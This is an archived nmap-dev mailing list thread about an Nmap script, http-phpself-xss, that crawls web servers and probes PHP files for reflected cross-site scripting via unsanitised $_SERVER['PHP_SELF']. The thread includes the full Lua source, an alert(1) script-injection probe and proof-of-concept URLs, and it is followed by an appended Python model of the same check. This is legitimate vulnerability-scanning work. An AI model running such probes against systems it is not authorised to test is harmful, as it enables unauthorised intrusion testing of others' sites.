Nmap Development mailing list archives

Re: http-phpself-xss


From: stripes <stripes () tigerlair com>
Date: Thu, 5 Jul 2012 01:55:06 -0400

If you have a system I can test it against, I'll be more than happy to test it with the latest build.

-Anne

On Thu, Jul 05, 2012 at 12:45:53AM -0500, Paulino Calderon wrote:
Hi list,

I've updated the script http-phpself-xss. Has anyone had a chance to 
test it? What do you think about the name? Is it implicit enough? Maybe  
http-phpself-xss-scan would be better. Anyway, I think this script is 
ready to be committed but I'd love to hear your thoughts before doing that.

Cheers.


On 30/05/2011 02:20 p.m., Paulino Calderon wrote:
Correct. Lots of developers use $_SERVER["PHP_SELF"] to retrieve the 
script's name without escaping it first, not knowing that attackers can 
tamper with this variable.

Other examples are:
* http://www.mc2design.com/blog/php_self-safe-alternatives
* http://www.securityfocus.com/bid/37351
* http://software-security.sans.org/blog/2011/05/02/spot-vuln-percentage

I'll submit a new script to scan for more generic cross site scripting 
vulnerabilities after I make sure the crawling / parsing of all the 
malformed documents out there works correctly ;)

Cheers.

On 05/30/2011 07:54 AM, Abuse007 wrote:
If I'm not mistaken the script is not trying to exploit the php 
parameters, such as data in your second example, but rather the 
PHP_SELF variable which is set to the relative URL of the currently 
executing script - including what comes after the php file.

From the doco:

The filename of the currently executing script, relative to the 
document root. For instance, $_SERVER['PHP_SELF'] in a script at the 
address http://example.com/test.php/foo.bar would be /test.php/foo.bar.



See:
http://spotthevuln.com/2009/10/privilege-escalation-one-damn-thing/

Cheers



On 30/05/2011, at 11:07 PM, "Hans Nilsson" <hasse_gg () ftml net> wrote:

What about when only certain variables are vulnerable?

For example
example.com/test.php?<script>alert(1)</script>
may not work when
example.com/test.php?data=<script>alert(1)</script>
works.

Or what about if only POST-data is vulnerable?

/Hans


On Sun, 29 May 2011 03:04 -0700, "Paulino Calderon" <paulino () calderonpale com> wrote:
Hi everyone,

I'm attaching my script 'http-phpself-xss', this script detects php
files vulnerable to Phpself Cross Site Scripting(*) in a web server.

First, the script crawls the webserver to list all php files and then it
sends an attack probe to identify all vulnerable scripts.

Feel free to test this script against my dummy app ->
http://calder0n.com/sillyapp/

(*) Phpself Cross Site Scripting vulnerabilities refer to cross site
scripting vulnerabilities caused by the lack of sanitization of the
variable $_SERVER["PHP_SELF"] in PHP scripts/web applications.

Cheers.

-- 
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: @paulinocaIderon


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Email had 1 attachment:
+ http-phpself-xss.nse
  12k (text/plain)
-- 
  Hans Nilsson
  hasse_gg () ftml net






-- 
Paulino Calderón Pale
Website: http://calderonpale.com
Twitter: http://twitter.com/calderpwn


description=[[
Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable
$_SERVER["PHP_SELF"].

This script crawls the webserver to create a list of PHP files and then sends an attack vector/probe to identify
PHP_SELF cross site scripting vulnerabilities.
PHP_SELF XSS refers to reflected cross site scripting vulnerabilities caused by the lack of sanitization of the
variable <code>$_SERVER["PHP_SELF"]</code> in PHP scripts. This variable is
commonly used in PHP scripts that display forms and when the script file name is needed.

Examples of Cross Site Scripting vulnerabilities in the variable $_SERVER[PHP_SELF]:
* http://www.securityfocus.com/bid/37351
* http://software-security.sans.org/blog/2011/05/02/spot-vuln-percentage
* http://websec.ca/advisories/view/xss-vulnerabilities-mantisbt-1.2.x

The attack vector/probe used is: <code>/'"/><script>alert(1)</script></code>
]]
---
-- @usage
-- nmap --script=http-phpself-xss -p80 <target>
-- nmap -sV --script http-phpself-xss <target>
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-phpself-xss:
-- |   VULNERABLE:
-- |   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
-- |
-- |     Extra information:
-- |
-- |   Vulnerable files with proof of concept:
-- |     http://calder0n.com/sillyapp/three.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
-- |     http://calder0n.com/sillyapp/secret/2.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
-- |     http://calder0n.com/sillyapp/1.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
-- |     http://calder0n.com/sillyapp/secret/1.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
-- |   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=calder0n.com
-- |     References:
-- |       https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
-- |_      http://php.net/manual/en/reserved.variables.server.php
-- @args http-phpself-xss.uri URI. Default: /
-- @args http-phpself-xss.timeout Spidering timeout. Default: 10000
author = "Paulino Calderon"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"fuzzer", "intrusive", "vuln"}

local http = require 'http'
local httpspider = require 'httpspider'
local shortport = require 'shortport'
local url = require 'url'
local stdnse = require 'stdnse'
local vulns = require 'vulns'

portrule = shortport.http

-- PHP_SELF Attack vector
local PHP_SELF_PROBE = '/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E'
local probes = {}

--Checks if attack vector is in the response's body
--@param response Response table
--@return True if attack vector is found in response's body
local function check_probe_response(response)
  -- http.get can return a table without a body (timeout, connection error);
  -- treat that as "probe not reflected" instead of erroring in string.find
  if not response or not response.body then
    return false
  end
  stdnse.print_debug(3, "Probe response:\n%s", response.body)
  if string.find(response.body, "'\"/><script>alert(1)</script>", 1, true) ~= nil then
    return true
  end
  return false
end

--Launches probe request
--@param host Hostname
--@param port Port number
--@param uri URL String
--@return True if page is vulnerable/attack vector was found in body
local function launch_probe(host, port, uri)
  local probe_response

  --We avoid repeating probes.
  --This is a temp fix since httpspider does not keep track of previously parsed links at the moment.
  if probes[uri] then
    return false
  end

  stdnse.print_debug(1, "%s:HTTP GET %s%s", SCRIPT_NAME, uri, PHP_SELF_PROBE)
  probe_response = http.get(host, port, uri .. PHP_SELF_PROBE)

  --save probe in list to avoid repeating it
  probes[uri] = true

  if check_probe_response(probe_response) then
    return true
  end
  return false
end

---
--main
---
action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
  -- script args arrive as strings; convert so set_timeout gets a number
  local timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME..'.timeout')) or 10000
  local crawler = httpspider.Crawler:new(host, port, uri, { scriptname = SCRIPT_NAME } )
  crawler:set_timeout(timeout)

  local vuln = {
    title = 'Unsafe use of $_SERVER["PHP_SELF"] in PHP files',
    state = vulns.STATE.NOT_VULN,
    description = [[
PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
    ]],
    references = {
      'http://php.net/manual/en/reserved.variables.server.php',
      'https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)'
    }
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local vulnpages = {}

  while(true) do
    local status, r = crawler:crawl()
    if ( not(status) ) then
      if ( r.err ) then
        return stdnse.format_output(true, "ERROR: %s", r.reason)
      else
        break
      end
    end

    local parsed = url.parse(tostring(r.url))

    --Only work with .php files. "%.php$" is a literal dot anchored at the end of
    --the path; the earlier pattern ".*.php" used '.' as a wildcard and also
    --matched names such as foo.phpx.
    if ( parsed.path and parsed.path:match("%.php$") ) then
      --The following port/scheme code was seen in http-backup-finder and its neat =)
      --(link_host/link_port avoid shadowing the host/port the script was called with)
      local link_host, link_port = parsed.host, parsed.port
      if ( not(link_port) ) then
        link_port = (parsed.scheme == 'https') and 443
        link_port = link_port or ((parsed.scheme == 'http') and 80)
      end
      local escaped_link = parsed.path:gsub(" ", "%%20")
      if launch_probe(link_host, link_port, escaped_link) then
        table.insert(vulnpages, parsed.scheme..'://'..link_host..escaped_link..PHP_SELF_PROBE)
      end
    end
  end

  if ( #vulnpages > 0 ) then
    vuln.state = vulns.STATE.EXPLOIT
    vulnpages.name = "Vulnerable files with proof of concept:"
    vuln.extra_info = stdnse.format_output(true, vulnpages)..crawler:getLimitations()
  end

  return vuln_report:make_output(vuln)

end


--
If you don't know there's a        (\`--/') _ _______ .-r-.  
trampoline in the room, you're      >.~.\ `` ` `,`,`. ,'_'~`.          
not going to dust the ceiling for  (v_," ; `,-\ ; : ; \/,-~) \            
fingerprints. -Law & Order:SVU      `--'_..),-/ ' ' '_.>-' )`.`.__.')   
stripes at tigerlair dot com       ((,((,__..'~~~~~~((,__..'  `-..-'fL    
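As an added example (not part of the thread and not the NSE script's own code), the check the script relies on, modelled in Python: a page that writes $_SERVER['PHP_SELF'] into a form action raw beside one that passes it through htmlspecialchars, the .php path filter with a literal-dot pattern, and the same fixed-string reflection test the script runs on the response body. The host name example.test and the page table are constructed.

```python
import html
import re
from urllib.parse import quote

# Decoded probe; with it appended to a .php URL as PATH_INFO, PHP hands it
# back in $_SERVER['PHP_SELF'], so any page echoing PHP_SELF raw reflects it.
PHP_SELF_PROBE = "/'\"/><script>alert(1)</script>"
PROBE_PATH = "/" + quote(PHP_SELF_PROBE[1:], safe="/()")  # encoded, as sent on the wire

# Literal dot anchored at the end: the Lua pattern ".*.php" uses '.' as a
# wildcard and would also accept paths such as /foo.phpx.
PHP_FILE = re.compile(r"\.php$")

def is_php_path(path):
    return PHP_FILE.search(path) is not None

def probe_url(scheme, host, path, port=None):
    """URL the scanner would request: escaped path plus the probe as PATH_INFO."""
    default = 443 if scheme == "https" else 80
    netloc = host if port in (None, default) else f"{host}:{port}"
    return f"{scheme}://{netloc}{quote(path)}{PROBE_PATH}"

def reflects_probe(body):
    """Same fixed-string check as the script, guarded against a missing body."""
    return bool(body) and PHP_SELF_PROBE[1:] in body

def render_form(php_self, escape):
    """Models a PHP page writing $_SERVER['PHP_SELF'] into a form action;
    escape=True stands for htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES)."""
    value = html.escape(php_self, quote=True) if escape else php_self
    return f'<form action="{value}" method="post"><input name="q"></form>'

# Constructed crawl result: path -> whether that page escapes PHP_SELF.
SAMPLE_PAGES = {
    "/sillyapp/1.php": False,       # raw echo: probe comes back verbatim
    "/sillyapp/safe.php": True,     # htmlspecialchars: probe comes back encoded
    "/sillyapp/index.phpx": False,  # not a PHP file, skipped by the filter
    "/sillyapp/readme.txt": False,
}

def scan(pages, host="example.test"):
    """Proof-of-concept URLs for pages that reflect the probe unescaped."""
    vulnerable = []
    for path, escapes in pages.items():
        if not is_php_path(path):
            continue
        body = render_form(path + PHP_SELF_PROBE, escapes)  # what PHP_SELF becomes
        if reflects_probe(body):
            vulnerable.append(probe_url("http", host, path))
    return vulnerable
```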

